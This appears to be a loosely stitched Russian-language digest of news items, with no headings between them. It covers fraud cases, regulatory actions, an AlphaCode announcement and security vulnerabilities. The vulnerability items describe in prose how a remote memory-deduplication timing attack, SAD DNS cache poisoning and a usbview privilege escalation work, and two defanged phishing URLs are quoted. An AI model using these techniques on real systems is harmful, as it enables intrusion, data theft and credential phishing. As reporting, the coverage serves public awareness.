Потерпевший на онлайн-площадке нашел предложение об аренде квартиры. Он связался с арендодателем и тот сообщил о необходимости внести полную предоплату. Мужчина согласился.
Заявительница в Instagram нашла предложение об аренде дома с купелью. Профиль внушал доверие: был красиво оформлен и имел много подписчиков. Девушка связалась с администратором и внесла пятидесятипроцентную предоплату.
После перечисления денег в обоих случаях фейковые профили были удалены, а лжеадминистраторы перестали выходить на связь. Суммарно минчане лишились около Br1,3 тыс. Следователи возбудили уголовные дела по фактам мошенничества.
Сотрудники ОПК Советского РУВД столицы выявили факт незаконного оборота платежных средств. Пара молодых минчан оформляла на себя платежные карты и продавала их знакомой. Об этом сообщили в ГУВД Мингорисполкома.
Следствие установило, что 24-летний минчанин и его 19-летняя подруга решили найти подработку. Знакомая молодых людей предложила им оформить платежные карты и передать их с реквизитами за вознаграждение. Девушка утверждала, что подработка легальная и таким способом можно быстро и легко получить деньги.
Молодые люди поверили, оформили на себя платежные карты, после чего передали их за вознаграждение. Парень, кроме того, оформил доверенность на право распоряжения БПК.
Следователи возбудили уголовное дело за незаконный оборот средств платежа.
Роскомнадзор принял меры понуждения в отношении TikTok Pte. Ltd., Telegram Messenger, Inc., Zoom Video Communications, Inc., Discord, Inc. и Pinterest, Inc. Теперь поисковики обязаны отмечать их как нарушителей российского законодательства в поисковой выдаче.
[](https://xakep.ru/wp- content/uploads/2022/08/399166/TikTok.jpg)
Ранее ведомство уже принимало аналогичные меры в отношении Google, Twitch и Wikimedia Foundation, обвиняя их в нарушении неудалении запрещенной информации – фейков о специальной военной операции на территории Украины.
Так, меры понуждения затронули Twitch из-за ч. 2 ст. 13.41 КоАП РФ, а в отношении Wikimedia Foundation, по словам исполнительного директора «Викимедиа РУ» Станислава Козловского, применили ст. 11 Федерального закона 236 «О приземлении». Согласно ей, операторы поисковиков, которые распространяют рекламу в российском интернете, должны давать пользователям информацию о ресурсе при выдаче по их запросам.
Теперь аналогичные меры распространены на TikTok, Telegram, Zoom, Discord и Pinterest, а представители Роскомнадзора пишут:
«Вышеуказанные ИТ-компании не соблюдают порядок удаления запрещённой информации и основные обязанности, установленные федеральным законом № 236-ФЗ "О деятельности иностранных лиц в сети “Интернет» на территории РФ”.
Принятые меры информирующего характера будут действовать до полного устранения иностранными компаниями нарушений российского законодательства».Click to expand...
В аэропорту штата Теннесси задержаны три женщины в возрасте от 22 до 34 лет, которых подозревают в мошенничестве с подарочными картами. На них обратили внимание после того, как они попытались забрать багаж, оформленный на имя другого человека.
Чемодан прибыл в Теннесси рейсом авиакомпании Southwest Airlines без сопровождения. Его попыталась забрать женщина, имя которой не совпадало с именем на багажной бирке. Она ушла, но ее поведение показалось подозрительным местным полицейским, которые вскрыли чемодан. Внутри оказалось много новой одежды с бирками, квитанции, поддельные водительские права штата Пенсильвания и украденная кредитка.
Силовики вызвали подкрепление и стали ждать развития событий. Через несколько часов та же самая женщина вновь попыталась получить багаж, но вместо этого снова получила отказ. Полицейские проследили за ней до парковки аэропорта, где, как оказалось, кардершу ждали в машине две ее подруги.
При обыске в авто нашли 302 (!) подарочные карты 11 различных ритейлеров на сумму в 20,5 тысячи долларов. Кроме того, там были чеки и свежекупленные товары на 9000 долларов. Все три женщины заявили, что не знают, как все это добро оказалось в машине. Но оперативникам удалось раскрутить всю цепочку.
Они выяснили, что женщины приезжали в магазины, где покупали по восемь подарочных карт, которые оплачивали деньгами с краденных кредиток. После этого они выжидали несколько дней и оформляли возврат в других магазинах той же сети, но уже по одной карте за раз. Несложная схема позволяла легализовывать ворованные с чужого пластика деньги.
source: komonews.com/news/nation-world/suspected-gift-card-fraud-ring-snagged- at-tenn-airport-30k-of-stolen-merchandise-recovered-criminal-activity-stolen- credit-card-johniesha-jones-cherish-lynn-harris-torryiel-griggs-counterfeit- merchandise
В Березовском (Свердловская область) перед судом предстанет 42-летняя экс- сотрудница банка, обвиняемая в хищении средств пенсионера-вкладчика, сообщили в пресс-службе свердловской прокуратуры.
По данным ведомства, женщину обвиняют по х п. «б» ч. 4 ст. 158 УК РФ (кража, совершенная с банковского счета, в особо крупном размере), ч. 5 ст. 327 УК РФ (использование заведомо подложного документа), ч. 3 ст. 272 УК РФ (неправомерный доступ к охраняемой компьютерной информации, если это деяние повлекло модификацию компьютерной информации, с использованием служебного положения), ч. 3 ст. 285 УК РФ (злоупотребление должностными полномочиями, повлекшее тяжкие последствия).
По версии следствия, женщина, являясь ведущим операционистом отделения банка, благодаря своему служебному положению имела доступ к информации о вкладчиках. В декабре прошлого года она узнала, что на счету пожилого мужчины из Березовского есть крупные накопления. Также она выяснила, что в силу своего возраста и состояния здоровья пенсионер социально не активен и сам в банк не придет.
В феврале этого года банковская сотрудница от имени пенсионера сформировала заявление о выдаче банковской карты и об открытии на его имя нового банковского счета. В заявлении она сама поставила подпись от его имени. После этого женщина привязав к банковской карте подконтрольный абонентский номер и получила доступ к двум счетам пенсионера через мобильное приложение. Далее сотрудница перевела на счет, к которому была привязана новая банковская карта, 1,5 млн руб.
Прокуратура Березовского утвердила обвинительное заключение, уголовное дело направлено в суд.
AppOmni выпустили отчёт о состоянии инфобеза на рынке Software-as-a-Service. Из интересного, три ключевых проблемы в этой сфере.
Первая – ошибочные представления о безопасности SaaS-продуктов, что резко
контрастирует с утечками, неверными настройками и разрешениями, незащищёнными
данными в них.
Вторая – чрезмерная уверенность в прозрачности инфобез-рисков в этой среде.
И третья – непонимание того, какие вообще риски несёт использование SaaS-
решений.
Всё это суммарно ведёт к забавной коллизии.
85% пользователей SaaS-продуктов блаженно уверены в их безопасности, а 71%
высоко оценивают своё понимание рисков.
Но при этом только 21% SaaS-решений сообщают об отсутствии инцидентов с
кибербезопасностью за последний год.
Такой вот инфобез-парадокс с далеко идущими последствиями. — Безопасность
видишь? — Вижу. — А её нет. — Понятно, давайте подпишемся ещё на парочку
SaaS'ов.
Edit: T.Hunter
Report: thehackernews.com/2023/08/cisos-tout-saas-cybersecurity.html
компромат против Запада
По словам собеседника The Times, это могут сделать в надежде "застать врасплох" союзников по НАТО, дестабилизировать обстановку и запутать ситуацию в случае, если Россия начнет якобы планируемое вторжение на Украину
Министр обороны Великобритании Бен Уоллес обвинил Россию в планировании кибератак и операций, нацеленных на то, чтобы скомпрометировать Запад и дополнительно осложнить напряженную ситуацию вокруг Украины. Утверждения главы оборонного ведомства и его подчиненных приводит в пятницу на своем сайте газета The Times.
"Их операции осуществляются сразу во многих сферах, - заявил Уоллес, говоря о якобы применяемой Москвой тактике. - Я ожидал бы, что какое-либо российское наступление будет иметь кибернетический компонент наравне с физическим. Компромат также является частью этого инструментария".
По словам высокопоставленного источника The Times в британском Минобороны, там ждут, что "Россия осуществит огромное количество кибератак и распространит компромат против Запада". По словам собеседника издания, это может быть сделано в надежде "застать врасплох" союзников по НАТО, дестабилизировать обстановку и запутать ситуацию в случае, если Россия начнет якобы планируемое вторжение на Украину. При этом The Times также пишет, что Россия может планировать враждебные действия в так называемой серой зоне, чтобы не переходить к открытому противостоянию. Под "серой зоной" военные в Великобритании и других странах НАТО подразумевают область гибридных конфликтов, противостояния на грани мира и войны, в том числе с использованием информационных и киберсредств.
В последнее время в странах Запада, а также на Украине звучат заявления о возможном вторжении России на украинскую территорию. Пресс-секретарь президента России Дмитрий Песков называл подобную информацию пустым и безосновательным нагнетанием напряженности. Он подчеркивал, что Россия ни для кого не представляет угрозу. При этом он не исключил возможность провокаций, чтобы оправдать такие заявления, и предупредил, что попытки силового решения кризиса на юго-востоке Украины будут иметь самые серьезные последствия.
Жительница Смелы под видом международной помощи выманила у женщины 73 тысячи гривен. По факту мошенничества продолжается досудебное расследование, устанавливаются все обстоятельства и лица, которые могли пострадать от противоправных действий мошенницы.
К работникам отдела противодействия киберпреступлениям в Черкасской области обратилась черкащанка. Женщина рассказала, что ей позвонила неизвестная, которая представилась официальным представителем гуманитарной миссии ООН в Украине и предложила оформить денежную помощь. Женщина заинтересовалась и следуя указаниям, которые предлагала неизвестная, в результате потеряла 73 тысячи гривен.
Во время проведения следственно-розыскных действий работники киберполиции совместно со следователями следственного управления ГУНП в Черкасской области, при процессуальном руководстве прокуратуры Черкасской области установили личность мошенницы. Ею оказалась 25-летняя жительница города Смела.
В этом году женщина уже задерживалась полицией за совершение мошеннических действий. В августе она была приговорена судом к 3 годам лишения свободы с испытательным сроком 2 года.
По факту мошенничества полицией открыто уголовное производство, ч. 4 ст. 190 УК Украины. Правонарушительнице грозит до двенадцати лет с конфискацией имущества.
В настоящее время продолжается досудебное расследование. Устанавливаются все обстоятельства и лица, которые могли пострадать от противоправных действий мошенницы.
Российские музыканты, работающие в ИТ-компаниях, выпустили совместный трибьют- альбом «Прощальный концерт» в честь 130-летия со дня рождения поэта-футуриста Владимира Маяковского. В сборник вошли восемь треков, написанных участниками «МаякФеста» — музыкального конкурса для групп из сферы IT, который проходит в рамках международного киберфестиваля Positive Hack Days.
В создании альбома приняли участие группы Dotla, Grade Zero, Human Laces, Of Titans and Men, The Serious Men, Red Nettle Hills и «с этой планеты». Участники этих музыкальных коллективов представляют десять отечественных компаний из сферы информационных технологий: CyberOK, Positive Technologies, SmartPlayer, «Артенеси», «КРОК», «ЛАСП Технологии», «Милдсофт» и «Строй Инвест Проект».
Концерт «МаякФест» в Парке Горького 20 мая этого года стал настоящей точкой притяжения для комьюнити специалистов из областей IT и ИБ. Участники музыкального фестиваля исполнили свои песни на стихи Владимира Маяковского. С 19 июля, со дня рождения поэта, все эти треки в составе альбома в его честь будут доступны на популярных цифровых площадках: «Яндекс Музыке», «VK Музыке», Apple Music, YouTube Music, Spotify и других.
Инициатором идеи и главным продюсером проекта выступила компания Positive Technologies — лидер рынка результативной кибербезопасности. Трибьют-альбом «Прощальный концерт выпущен при поддержке компании «Инфосистемы Джет» и медиахолдинга Rambler&Co, генерального информационного партнера Positive Hack Days.
«Многие спрашивали: как Маяковский связан с тем, что вы делаете? И для нас ответ очевиден: он — фигура, соединяющая в себе цифровой мир и мир искусства. Владимир Маяковский, как истинный футурист, смотрел в будущее, интересовался новыми технологиями и не боялся их. В поэме „Летающий пролетарий“ он даже описывал компьютеризацию и роботизацию, появление мобильных телефонов и умных домов. Нет сомнений в том, что если бы поэт жил в наше время, то наверняка давал бы концерты в метавселенных и выставлял свои произведения на NFT- маркетплейсах», — говорит генеральный продюсер киберфестиваля Positive Hack Days Виктория Алексеева.
По словам организаторов проекта, выпуск трибьют-альбома призван привлечь общественное внимание к наследию крупнейшего поэта XX века и продемонстрировать, что даже спустя 100 лет его творчество не теряет своей актуальности и продолжает вдохновлять новые поколения.
• Music: https://bfan.link/pr-kncrt
Аналитики Recorded Future [заметили](https://www.recordedfuture.com/threat- actors-continue-to-abuse-google-tag-manager-for-payment-card-e- skimming?__hstc=156209188.f9008f1fad9db0f0b46fa98e214c9d1f.1657715644929.1663818338837.1663854955191.38&__hssc=156209188.1.1663854955191&__hsfp=1049501048), что хакеры используют контейнеры Google Tag Manager (GTM) для внедрения электронных скиммеров, которые затем воруют данные банковских карт и личную информацию покупателей на e-commerce сайтах.
GTM используется на тысячах сайтов для сбора различных метрик, отслеживания клиентов и прочих маркетинговых целей. GTM использует контейнеры для встраивания JavaScript и других ресурсов на сайты, а преступники научились скрывать в контейнерах GTM вредоносные скрипты, что позволяет им похищать личную информацию покупателей.
В общей сложности исследователи обнаружили 569 e-commerce доменов, зараженных веб-скиммерами. Согласно отчету, подтверждено, что 314 из них были заражены GTM-скиммерами, а еще 255 отправляли украденные данные на вредоносные домены, связанные со злоупотреблением GTM.
По состоянию на 25 августа 2022 года, почти 90 из этих доменов все еще были заражены, и исследователи говорят, что в среднем для устранения взлома администраторам требуется более трех месяцев.
[](https://xakep.ru/wp- content/uploads/2022/09/402576/Screen-Shot-2022-09-20-at-10.22.jpg)
«В настоящий момент в кардшопах в даркнете размещены данные более 165 000 платежных карт, принадлежащих жертвам атак, которые связаны с контейнерами GTM, — пишут исследователи. — Общее количество платежных карт, скомпрометированных с помощью GTM веб-скиммеров, вероятно, будет даже больше».
Click to expand...
При этом эксперты отмечают, что, судя по обсуждениям в даркнете, злоупотребление GTM началось еще в 2018 году, и уже тогда использовалось различными хак-группами.
«Впервые мы сообщили о злоупотреблении GTM в отчете от 2021 года, и GTM активно эксплуатируют по сей день. В некоторых случаях используются те же вредоносные GTM-бакеты, о которых сообщалось еще в прошлом году. Мы считаем, что эксплуатация GTM останется неизменной, если Google не исправит проблему и не внедрит активное сканирование для обнаружения пейлоадов скиммеров внутри GTM- бакетов», — считают эксперты.
Click to expand...
Recorded Future начала отслеживать эксплуатацию трех вариантов GTM-скиммеров еще в марте 2021 года и отмечает, что с тех пор новые зараженные домены появляются каждый месяц.
[](https://xakep.ru/wp- content/uploads/2022/09/402576/Screen-Shot-2022-09-20-at-9.30.1.jpg)
Первый и третий варианты скиммеров имеют определенное сходство, которое позволяет предположить, что за их созданием стоят одни и те же хакеры, которые регулярно обновляют свои инструменты, чтобы избежать обнаружения.
«Все три варианта используют отдельные скрипты-скиммеры и домены для извлечения данных. Все три варианта в настоящее время используются для активных заражений и развертывались для заражения новых доменов в августе 2022 года, то есть все три варианта представляют риск для e-commerce сайтов и их клиентов», — говорят исследователи.
Click to expand...
При этом известно, что хакеры нацелены не только на «дорогие» домены, которые насчитывают более миллиона посетителей в месяц. Некоторые из сайтов, подвергшихся атакам, посещали всего около 10 000 человек.
Большинство пострадавших сайтов базируются в США, на них приходится более 66% заражений. Остальные были обнаружены в Канаде, Великобритании, Аргентине, Индии, Италии, Австралии, Бразилии, Греции, Индонезии и других странах.
Китайских хакеров подозревают во взломе компьютеров журналистов News Corp
Злоумышленники получили доступ к электронным почтовым ящикам News Corp и скомпрометировали данные неопределенного числа журналистов, сообщила компания. Советник по интернет-безопасности медиакомпании сказал, что взлом, скорее всего, был направлен на сбор разведданных в интересах Пекина. News Corp, издающая Wall Street Journal, сообщила, что взлом был выявлен в конце января и затронул электронную почту и документы ограниченного числа сотрудников, включая журналистов. Компания сообщила, что провайдер услуг в сфере кибербезопасности Mandiant локализовал последствия взлома.
Дэвид Вонг, вице-президент по консалтингу Mandiant, сказал, что хакеры, предположительно, «связаны с Китаем и, скорее всего, занимаются шпионажем с целью сбора разведданных в интересах Китая». В письме руководители News Corp сообщили сотрудникам, что взлом затронул «ограниченное количество рабочих электронных почтовых ящиков и документов из штаб-квартиры News Corp, News Technology Services, Dow Jones, News UK и New York Post».
Представитель посольства Китая в Вашингтоне сказал, что ему неизвестны подробности новостей, но он надеется на «профессиональный, ответственный и основанный на фактах подход к выявлению инцидентов, связанных с киберпространством, вместо выпуска заявлений, основанных на домыслах».
Из серии - грузите апельсины бочками, или как надо воровать!)
__
An Ethereum messaging service.
www.notifi.xyz
10 единиц баг баунти - Like a BOSS! )
Сама кулстори: <https://decrypt.co/91899/hacker-steals-250-million-solana- ethereum-bridge-wormhole>
Южнокорейские ученые предлагают использовать шелк для надежной криптозащиты
Исследователи из Института науки и технологий в Кванджу разработали технологии шифрования большой криптографической стойкости с использованием уникальной структуры волокон шелка.
Исследователи из Южнокорейского института науки и технологий Кванджу (GIST) предложили создавать невзламываемые ключи шифрования при помощи шёлка, сообщает The Register.
Как оказалось, шелк является отличным материалом в плане физически неклонируемых функций (PUF) и прекрасно подходит для создания надежных криптографических систем.
Ученые обратили внимание на уникальность рисунка дифракции света на шелковой нити, с помощью которого можно создать стойкий криптографический ключ, позволяющий обеспечить практически непреодолимую криптозащиту данных. Чтобы взломать подобную криптозащиту, искусственно воссоздав уникальную «световую подпись» одного участка шёлкового волокна ключа, при современных мощностях потребуется 5×10⁴¹ лет.
Исследователи разработали считыватель специальных идентификационных карт с нужным участком шелка. Кроме того, они создали сами карты, в которых содержится участок шелковой нити, используемый для криптографических операций.
Группа исследователей из Грацского технического университета (Австрия), ранее известная разработкой атак MDS, NetSpectre, Throwhammer и ZombieLoad, опубликовала новый метод атаки (CVE-2021-3714) по сторонним каналам на механизм дедупликации страниц памяти (Memory- Deduplication), позволяющий определить наличие в памяти определённых данных, организовать побайтовую утечку содержимого памяти или определить раскладку памяти для обхода защиты на основе рандомизации адресов (ASLR). От ранее демонстрируемых вариантов атак на механизм дедупликации новый метод отличается проведением атаки с внешнего хоста с использованием в качестве критерия изменения времени ответов на отправляемые атакующим запросы по протоколам HTTP/1 и HTTP/2. Возможность проведения атаки продемонстрирована для серверов на базе Linux и Windows.
Атаки на механизм дедупликации памяти используют в качестве канала для утечки сведений разницу во времени обработки операции записи в ситуациях, когда изменение данных приводит к клонированию дедуплицированной страницы памяти при помощи механизма Copy-On-Write (COW). В процессе работы ядро определяет одинаковые страницы памяти от разных процессов и объединяет их, отображая идентичные страницы памяти в одну область физической памяти для хранения только одной копии. При попытке изменения одним из процессов данных, связанных с дедуплицированными страницами, возникает исключение (page fault) и при помощи механизма Copy-On-Write автоматически создаётся отдельная копия страницы памяти, которая закрепляется за процессом. На выполнение копирования тратится дополнительное время, что может быть признаком изменения данных пересекающихся с другим процессом.
Исследователи показали, что возникающие в результате работы механизма COW задержки можно уловить не только локально, но и анализируя изменение времени доставки ответов по сети. Предложено несколько методов определения содержимого памяти с удалённого хоста через анализ времени выполнения запросов по протоколам HTTP/1 и HTTP/2. Для сохранения подбираемых шаблонов используются типовые web-приложения, сохраняющие в памяти поступающую в запросах информацию.
Общий принцип атаки сводится к заполнению на сервере страницы памяти данными, потенциально повторяющим содержимое уже имеющейся на сервере страницы памяти. Затем атакующий ожидает время, необходимое для выполнения ядром дедупликации и объединения страницы памяти, после чего производит изменение контролируемого дубликата данных и оценивает время реакции для определения успешности попадания.
В ходе проведённых экспериментов максимальная скорость утечки информации составила 34.41 байт в час при атаке через глобальную сеть и 302.16 байт в час при атаке через локальную сеть, что быстрее других методов извлечения данных по сторонним каналам (например, при атаке NetSpectre скорость передачи данных составляет 7.5 байт в час).
Предложено три рабочих варианта атаки. Первый вариант позволяет определить данные в памяти web-сервера, на котором используется Memcached. Атака сводится к загрузке определённых наборов данных в хранилище Memcached, очистке дедуплицированного блока, повторной записи того же элемента и создания условия для возникновения COW-копирования через изменение содержимого блока. В ходе эксперимента с Memcached удалось за 166.51 секунд определить версию libc, установленную в системе, запущенной в виртуальной машине.
Второй вариант дал возможность узнать содержимое записей в СУБД MariaDB, при использовании хранилища InnoDB, через воссоздание содержимого байт за байтом. Атака производится через отправку специально изменённых запросов, приводящих к однобайтовым несовпадениям в страницах памяти и анализе времени реакции для определения, что догадка о содержимом байта была верной. Cкорость подобной утечки невелика и составляет 1.5 байт в час при атаке из локальной сети. Плюсом метода является то, что он может применяться для восстановления неизвестного содержимого памяти.
Третий вариант позволил за 4 минуты полностью обойти механизм защиты KASLR и получить информацию о смещении в памяти образа ядра виртуальной машины, в ситуации когда адрес смещения находится в странице памяти, другие данные в которой не изменяются. Атака осуществлялась с хоста, находящегося за 14 транзитных переходов (hops) от атакуемой системы.
Примеры кода для осуществления представленных атак обещают опубликовать на GitHub.
Как сообщают специалисты BleepingComputer, злоумышленники задействовали новую
систему фишинговых атак, нацеленную на аккаунты Twitter с синей галочкой. Они
рассылают потенциальным жертвам письма с призывом обновить свои данные, чтобы
не потерять верификацию. BleepingComputer предполагает, что кампания вызвана
инцидентами с изъятием синих галочек с реальных аккаунтов пользователей.
Twitter уже несколько лет испытывает проблемы с верификацией аккаунтов. В мае этого года соцсеть заверила, что перестроила работу системы и более чётко прописала правила выдачи галочек. Тем не менее, после обновления системы летом пользователь Twitter (специалист по обработке данных с ником Conspirador Norteño) обнаружил несколько фейковых аккаунтов с галочкой верификации. Эти профили не соответствовали собственным правилам соцсети, по которой она подтверждает аккаунты.
Twitter призналась, что подтвердила верификацию по ошибке, и заблокировала найденные профили. В августе соцсеть в очередной раз закрыла выдачу новых синих галочек, возобновив её в середине сентября. После этого известные пользователи начали жаловаться, что Twitter отбирает у них верификацию из-за несоответствия новым правилам. Эта волна совпала с приходом Парага Агравала на пост генерального директора Twitter.
Злоумышленники используют недовольство верифицированных пользователей и
неразбериху для своих фишинговых атак. Они рассылают на аккаунты пользователей
письма, копирующие дизайн писем от Twitter. В них содержится призыв обновить
свои данные, чтобы сохранить галочку, и кнопка «Обновить здесь», ведущая на
страницы — https://www.cleancredit[.]in/wp- content/uploads/2021/12/index.html
и
https://dublock[.]com/dublock/twitter/.
. При переходе потенциальная жертва
видит окошко, в котором предлагают ввести учётные данные.
После заполнения данных система отправляет пользователю код двухфакторной
аутентификации и просит ввести его в следующем окне.
После система отправляет пользователя на домашнюю страницу Twitter. Таким
образом, люди могут и не подозревать, что злоумышленники собрали их данные.
BleepingComputer призывает владельцев аккаунтов остерегаться таких фишинговых
писем и воздерживаться от открытия любых ссылок или вложений внутри писем.
Компания DeepMind, получившая известность своими разработками в области искусственного интеллекта и построения нейронных сетей, способных играть в компьютерные и настольные игры на уровне человека, представила проект AlphaСodeAlphaCode, развивающий систему машинного обучения для генерации кода, способную участвовать в соревнованиях по программированию на платформе Codeforces и демонстрировать средний результат. Ключевой особенностью разработки является способность генерировать код на языках Python или C++, принимая на входе текст с постановкой задачи на английском языке.
Для тестирования системы были отобраны 10 новых соревнований Codeforces с более чем 5000 участников, проведённые после завершения тренировки модели машинного обучения. Результаты выполнения заданий позволили системе AlphaСode войти примерно в середину рейтинга указанных соревнований (54.3%). Прогнозируемый общий рейтинг AlphaСode составил 1238 баллов, что обеспечивает вхождение в Top 28% среди всех участников Codeforces, хотя бы раз участвовавших в соревнованиях за последние 6 месяцев. Отмечается, что проект пока находится на начальной стадии развития и в будущем планируется повысить качество генерируемого кода, а также развивать AlphaСode в сторону систем, помогающих в написании кода, или средств разработки приложений, которыми смогут пользоваться люди без навыков программирования.
В проекте [используется](https://storage.googleapis.com/deepmind- media/AlphaCode/competition_level_code_generation_with_alphacode.pdf) архитектура нейронной сети "Transformer" в сочетании с методами семплирования и фильтрации, позволяющими генерировать различные непредсказуемые варианты кода, соответствующие тексту на естественном языке. После фильтрации, кластеризации и ранжирования из формируемого потока вариантов выбирается наиболее оптимальный рабочий код, который затем проверяется на предмет получения верного результата (в каждом задании соревнований указывается пример входных данных и соответствующий этому примеру результат, который должен быть получен после выполнении программы).
Для грубой тренировки системы машинного обучения была задействована кодовая база, доступная в публичных репозиториях GitHub. После подготовки начальной модели выполнялась фаза оптимизации, реализуемая на основе коллекции кода с примерами задач и решений, предлагаемых участникам соревнований Codeforces, CodeChef, HackerEarth, AtCoder и Aizu. Всего для тренировки было задействовано 715 ГБ кода с GitHub и более миллиона примеров решений типовых задач соревнований. Перед переходом к генерации кода текст задачи проходил фазу нормализации, на которой исключалось всё лишнее и оставлялись только значимые части.
[Раскрыта](https://www.mail-archive.com/openssl- announce@openssl.org/msg00363.html) информация об уязвимости (CVE-2021-4160) в криптографической библиотеке OpenSSL, вызванной ошибкой в реализации сумматора в функции BN_mod_exp, приводящей к возвращению неверного результата операции возведения в квадрат. Проблема проявляется только на оборудовании на базе архитектур MIPS32 и MIPS64, и может привести к компрометации алгоритмов на базе эллиптических кривых, включая используемые по умолчанию в TLS 1.3. Проблема устранена в декабрьских обновлениях OpenSSL 1.1.1m и 3.0.1.
Отмечается, что реализация реальных атак по получению информации о закрытых ключах с использованием выявленной проблемы рассматривается для RSA, DSA и алгоритма Диффи—Хеллмана (DH, Diffie-Hellman) как возможная, но маловероятная, слишком сложная для проведения и требующая огромных вычислительных ресурсов. При этом атака на TLS исключается, так как в 2016 году при устранении уязвимости CVE-2016-0701 было запрещено совместное использование клиентами одного закрытого ключа DH.
Дополнительно можно отметить несколько недавно выявленных уязвимостей в открытых проектах:
• Несколько [уязвимостей](https://www.openwall.com/lists/oss- security/2022/01/25/12) [(CVE-2022-0330](https://security- tracker.debian.org/tracker/CVE-2022-0330)) в графическом драйвере i915, связанных с отсутствием сброса TLB для GPU. В случае если не применяется IOMMU (трансляции адресов) уязвимость позволяет из пространства пользователя получить доступ к случайным страницам памяти. Проблема может быть использоваться для повреждения или чтения данных из случайных областей памяти. Проблема проявляется на всех встроенных и дискретных GPU Intel. Исправление реализовано через добавление обязательного сброса TLB до выполнения каждой операции возвращения буфера GPU в систему, что приведёт к снижению производительности. Влияние на производительность зависит от GPU, выполняемых на GPU операций и нагрузки на систему. Исправление пока доступно только в виде патча.
• Уязвимость (CVE-2022-22942) в графическом драйвере vmwgfx, применяемом для реализации 3D-ускорения в окружениях VMware. Проблема позволяет непривилегированному пользователю получить доступ к файлам, открытым другими процессами в системе. Для атаки необходимо наличие доступа к устройству /dev/dri/card0 или /dev/dri/rendererD128, а также возможность выполнить вызов ioctl() с полученным файловым дескриптором.
• Уязвимости (CVE-2021-3996, CVE-2021-3995) в библиотеке libmount, поставляемой в пакете util-linux, позволяющие непривилегированному пользователю отмонтировать дисковые разделы, не имея на это полномочий. Проблема выявлена в ходе аудита SUID-root программ umount и fusermount.
• Уязвимости в стандартной Си-библиотеке Glibc, затрагивающие функции realpath (CVE-2021-3998) и getcwd ([CVE-2021-3999](https://security- tracker.debian.org/tracker/CVE-2021-3999)).
о Проблема в realpath() вызвана возвращением при определённых условиях некорректного значения, содержащего неочищенные остаточные данные из стека. Для SUID-root программы fusermount уязвимость можно использовать для получения конфиденциальных сведений из памяти процесса, например, для получения сведений об указателях.
о Проблема в getcwd() позволяет добиться переполнения буфера на один байт. Проблема вызвана ошибкой, присутствующей с 1995 года. Для вызова переполнения достаточно в отдельном пространстве имён точек монтирования выполнить вызов chdir() для каталога "/". Не сообщается, ограничивается ли уязвимость только аварийным завершением процесса, но в прошлом для подобных уязвимостей были случаи создания рабочих эксплоитов, несмотря на скептицизм разработчиков.
• Уязвимость (CVE-2022-23220) в пакете usbview, позволяющая локальным пользователям, вошедшим в систему через SSH, выполнить код с правами root, из-за наличия в правилах PolKit настройки (allow_any=yes) для запуска утилиты usbview под пользователем root без аутентификации. Эксплуатация сводится к использованию опции "--gtk- module" для загрузки своей библиотеки в usbview. Проблема устранена в версии usbview 2.2.
В Ростовской области осудят одиннадцать автоаферистов, обманувших 233 покупателей машин на 57 млн рублей.
Злоумышленники публиковали на сайтах и в буклетах объявления о возможности приобрести у них автомобили по заниженным ценам, затем предлагали клиентам взять выгодный кредит на покупку, но при оформлении сделок указывали в договорах высокую процентную ставку и выдавали машины, комплектации которых не соответствовали изначально заявленным.
При этом, если граждане отказывались от таких условий, подельники требовали
возместить салону неустойку в размере 20 % от стоимости транспортных средств.
В ходе расследования на имущество обвиняемых общей стоимостью порядка 160 млн
рублей был наложен арест.
Группа исследователей из Калифорнийского университета в Риверсайде опубликовала новый вариант атаки SAD DNS ([CVE-2021-20322](https://security- tracker.debian.org/tracker/CVE-2021-20322)), работающий несмотря на защиту, добавленную в прошлом году для блокирования уязвимости CVE-2020-25705. Новый метод в целом аналогичен прошлогодней уязвимости и отличается лишь использованием другого типа ICMP-пакетов для проверки активных UDP-портов. Предложенная атака позволяет осуществить подстановку фиктивных данных в кэш DNS-сервера, что можно использовать для подмены в кэше IP-адреса произвольного домена и перенаправления обращений к домену на сервер злоумышленника.
Предложенный метод работоспособен только в сетевом стеке Linux из-за привязки к особенности работы механизма обработки ICMP-пакетов в Linux, который выступает источником утечки данных, упрощающих определения номера UDP-порта, использованного сервером для отправки внешнего запроса. Изменения, блокирующие утечку информации, приняты в состав ядра Linux в конце августа (исправление вошло в состав ядра 5.15 и сентябрьских обновлений LTS-веток ядра). Исправление сводится к переходу на использование в сетевых кэшах алгоритма хеширования SipHash вместо Jenkins Hash. Статус устранения уязвимости в дистрибутивах можно оценить на данных страницах: Debian, RHEL, Fedora, SUSE, Ubuntu.
По данным выявивших проблему исследователей уязвимости подвержено около 38% находящихся в сети открытых резолверов, включая популярные DNS-сервисы, такие как OpenDNS и Quad9 (9.9.9.9). Что касается серверного ПО, то атака может быть проведена при использовании на Linux-сервере таких пакетов, как BIND, Unbound и dnsmasq. На DNS-серверах, запущенных с использованием Windows и BSD-систем, проблема не проявляется. Для успешного совершения атаки необходимо использовать спуфинг IP, т.е. требуется чтобы провайдер атакующего не блокировал пакеты с поддельным исходным IP-адресом.
Напомним, что атака SAD DNS позволяет обойти защиту, добавленную в DNS-серверы для блокирования классического метода отравления кэша DNS, предложенного в 2008 году Дэном Камински (Dan Kaminsky). Метод Каминского манипулирует незначительным размером поля с идентификационным номером запроса DNS, который составляет всего 16 бит. Для подбора корректного идентификатора DNS-транзакции, необходимого для спуфинга имени хоста, достаточно отправить примерно 7000 запросов и симулировать около 140 тысяч фиктивных ответов. Атака сводится к отправке на DNS-резолвер большого числа пакетов с фиктивной привязкой к IP и с разными идентификаторами DNS- транзакции. Для предотвращения кэширования первого ответа в каждом фиктивном ответе указывается немного изменённое имя домена (1.example.com, 2.example.com, 3.example.com и т.п.).
Для защиты от данного вида атаки производители DNS-серверов реализовали случайное распределение номеров исходных сетевых портов, с которых отправляются запросы резолвинга, что компенсировало недостаточно большой размер идентификатора. После реализации защиты для отправки фиктивного ответа кроме подбора 16 битного идентификатора стало необходимо подобрать и один из 64 тысяч портов, что увеличило число вариантов для подбора до 2^32.
Метод SAD DNS позволяет кардинально упростить определение номера сетевого порта и свести атаку к классическому методу Каминского. Атакующий может определить обращение к неиспользуемым и активным UDP-портам, воспользовавшись утечкой сведений об активности сетевых портов при обработке ответных ICMP- пакетов. Метод позволяет на 4 порядка сократить число вариантов перебора - 2^16+2^16 вместо 2^32 (131_072 вместо 4_294_967_296). Утечка сведений, позволяющих быстро определить активные UDP-порты, вызвана недоработкой в коде обработки ICMP-пакетов с запросами фрагментации (флаг ICMP Fragmentation Needed) или перенаправления (флаг ICMP Redirect). Отправка подобных пакетов изменяет состояние кэша в сетевом стеке, что позволяет на основе реакции сервера определить какой из UDP-портов активен, а какой нет.
